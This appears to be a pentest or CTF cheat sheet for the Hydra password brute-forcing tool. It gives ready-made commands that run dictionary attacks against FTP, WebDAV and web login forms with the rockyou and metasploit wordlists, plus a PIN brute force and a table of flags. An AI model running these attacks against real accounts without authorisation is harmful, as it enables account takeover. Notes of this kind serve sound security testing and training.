
General use

hydra -f -V -t 64 -l <username> -P /usr/share/wordlists/rockyou.txt <IP> <service>
Option Description
hydra -l username -P wordlist.txt server service General command-line
hydra -l mark -P /usr/share/wordlists/rockyou.txt IP ftp
hydra -l mark -P /usr/share/wordlists/rockyou.txt ftp://IP
E.g. ftp
hydra -l <username> -P <wordlist> http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V Web form
server hostname or IP address of the target server.
service service which are trying to
launch the dictionary attack.
-l Specifies the single username for login
-L indicates a list of users
-p specifies the (SSH) password for login
-P indicates a list of passwords
-t 4 sets the number of threads to spawn
-s port number
-V Verbose for every attempt
-vV very verbose
shows login+pass for each attempt
-d Debugging
-f stops Hydra after finding a working password
http-post-form the type of the form is POST
<path> the login page URL, for example, login.php
<invalid_response> part of the response when the login fails


Brute force on the webdav subdir

hydra -L /usr/share/ -P <wordlist> IP_OR_DOMAIN http-get /webdav/

Post Web Form

General use
Against 1 user

hydra -f -V -t 64 -l <username> -P /usr/share/wordlists/rockyou.txt TARGET_IP_OR_DOMAIN http-post-form "/:username=^USER^&password=^PASS^:F=incorrect"

Both dictionaries

hydra -f -V -t 64 -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt TARGET_IP_OR_DOMAIN http-post-form "/:username=^USER^&password=^PASS^:F=incorrect"

Only a password is required

hydra -l '' -P 3digits.txt -f -v http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000

Pasted image 20231206174317.png|700

Option Description
http-post-form Specifies the HTTP method to use
-l '' Indicates that the login name is blank as the security lock only requires a password
/ The path of login subdirectory
username It's the form field where the username is entered
^USER^ The specified username(s) will replace
password It's the form field where the password is entered
^PASS^ The provided passwords will be replacing
F=incorrect String that appears in the server reply when the login fails